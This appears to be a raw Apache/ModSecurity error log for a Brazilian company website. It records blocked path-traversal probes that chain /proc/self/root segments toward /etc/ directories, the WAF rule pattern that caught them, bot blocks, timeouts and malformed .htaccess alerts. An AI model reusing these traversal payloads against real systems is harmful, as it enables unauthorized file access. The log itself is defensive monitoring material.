[Thu Mar 19 07:35:13.773212 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:34984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvRYda6ubjKNq_cu4YxLgAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:35:17.129804 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:35:17.955177 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.243.128:42266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvRZQbLMZ6AikZjR9VDzAAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:35:45.129783 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49212] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:35:56.880797 2026] [mime_magic:error] [pid 17653:tid 140411574073088] (70014)End of file found: [client 74.7.241.31:45604] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/systemd/system
[Thu Mar 19 07:36:12.137828 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:36:20.567228 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:38476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvRpNa6ubjKNq_cu4YxZgAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:36:30.018507 2026] [mime_magic:error] [pid 17887:tid 140411632822016] (70014)End of file found: [client 57.141.18.119:53292] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:36:30.311229 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:55448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvRrhkFeYa1D6dYQnDWvgAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:36:39.137834 2026] [proxy_fcgi:error] [pid 19093:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50548] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:36:45.950864 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.228.61:35830] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvRveyqAr6etmhZHNpKBwAAAEo"]
[Thu Mar 19 07:37:11.121885 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51448] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:37:20.940717 2026] [mime_magic:error] [pid 19093:tid 140411590858496] (70014)End of file found: [client 57.141.18.64:54482] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:37:39.141813 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52036] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:37:40.256674 2026] [mime_magic:error] [pid 17887:tid 140411691570944] (70014)End of file found: [client 57.141.18.36:54474] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:38:12.138940 2026] [proxy_fcgi:error] [pid 27403:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52832] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:38:43.135511 2026] [proxy_fcgi:error] [pid 27403:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53640] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:38:45.723996 2026] [mime_magic:error] [pid 17887:tid 140411582465792] (70014)End of file found: [client 57.141.18.115:56630] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:38:57.165116 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.244.43:40002] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvSQNa6ubjKNq_cu4Yx1QAAA0Q"]
[Thu Mar 19 07:39:08.133780 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54468] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:39:14.410005 2026] [core:alert] [pid 27403:tid 140411607643904] [client 57.141.18.77:57252] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 07:39:30.569862 2026] [proxy_fcgi:error] [pid 15826:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55038] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:39:52.133795 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:40:16.141915 2026] [proxy_fcgi:error] [pid 27403:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:40:39.129523 2026] [proxy_fcgi:error] [pid 19093:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56860] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:41:04.126236 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57558] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:41:30.127068 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58178] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:41:48.423884 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.228.61:60886] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvS7Mdf6f5d65gmYZRcBgAAAsg"]
[Thu Mar 19 07:42:00.153851 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59096] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:42:09.638087 2026] [core:alert] [pid 14269:tid 140411658000128] [client 57.141.18.31:33318] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:42:26.164828 2026] [core:alert] [pid 17653:tid 140411540502272] [client 57.141.18.94:34224] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 07:42:34.128327 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59806] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:42:36.073928 2026] [core:alert] [pid 17887:tid 140411658000128] [client 57.141.18.101:34330] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:42:44.121873 2026] [core:alert] [pid 26799:tid 140411582465792] [client 74.7.243.128:60222] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/net
[Thu Mar 19 07:43:03.129797 2026] [proxy_fcgi:error] [pid 19093:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:60458] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:43:34.002670 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:32918] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:43:55.517762 2026] [mime_magic:error] [pid 31803:tid 140411590858496] (70014)End of file found: [client 57.141.18.68:35644] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:44:00.553829 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33600] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:44:04.473290 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.244.43:51410] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvTdP-YZRR_7pZ7nDJ1rQAAA9g"]
[Thu Mar 19 07:44:25.121823 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:34230] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:44:51.137794 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34830] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:45:17.150330 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:45:17.718923 2026] [mime_magic:error] [pid 14269:tid 140411565680384] (70014)End of file found: [client 57.141.18.18:38304] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:45:36.569876 2026] [core:alert] [pid 31803:tid 140411658000128] [client 57.141.18.3:39058] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:45:44.670354 2026] [proxy_fcgi:error] [pid 27403:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:46:08.129371 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36840] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:46:33.125787 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37488] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:46:40.024702 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.243.128:54024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvUEP-YZRR_7pZ7nDJ2IQAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:46:50.916276 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.228.61:43886] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvUGhkFeYa1D6dYQnDYFQAAAcA"]
[Thu Mar 19 07:46:54.177552 2026] [core:alert] [pid 15826:tid 140411540502272] [client 57.141.18.6:40932] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:46:58.121856 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:47:24.118037 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39018] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:47:32.683480 2026] [core:alert] [pid 30077:tid 140411632822016] [client 57.141.18.115:42086] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:47:45.137315 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39556] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:48:09.130025 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40138] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:48:09.942146 2026] [core:alert] [pid 14269:tid 140411540502272] [client 57.141.18.95:42872] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:48:35.113332 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40674] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:48:42.446918 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.243.128:38652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvUihkFeYa1D6dYQnDYgAAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:48:48.657802 2026] [mime_magic:error] [pid 15826:tid 140411658000128] (70014)End of file found: [client 57.141.18.112:43574] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:48:59.929651 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:38466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvUmwbLMZ6AikZjR9VFkQAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:49:02.931792 2026] [mime_magic:error] [pid 14269:tid 140411666392832] (70014)End of file found: [client 57.141.18.67:44112] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:49:07.027401 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.244.43:38360] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvUowkwaGbbGflqUZCkiwAAAM4"]
[Thu Mar 19 07:49:09.072011 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41558] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:49:43.411291 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:38466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvUxwbLMZ6AikZjR9VFtAAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:49:47.130701 2026] [proxy_fcgi:error] [pid 27403:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:50:20.141857 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:50:48.093880 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:50:58.475331 2026] [core:alert] [pid 26799:tid 140411658000128] [client 57.141.18.8:45794] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:51:08.906504 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:41318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVHAkwaGbbGflqUZCk5gAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:51:10.145853 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44748] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:51:32.129905 2026] [proxy_fcgi:error] [pid 27403:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45308] AH01075: Error dispatching request to : (polling)
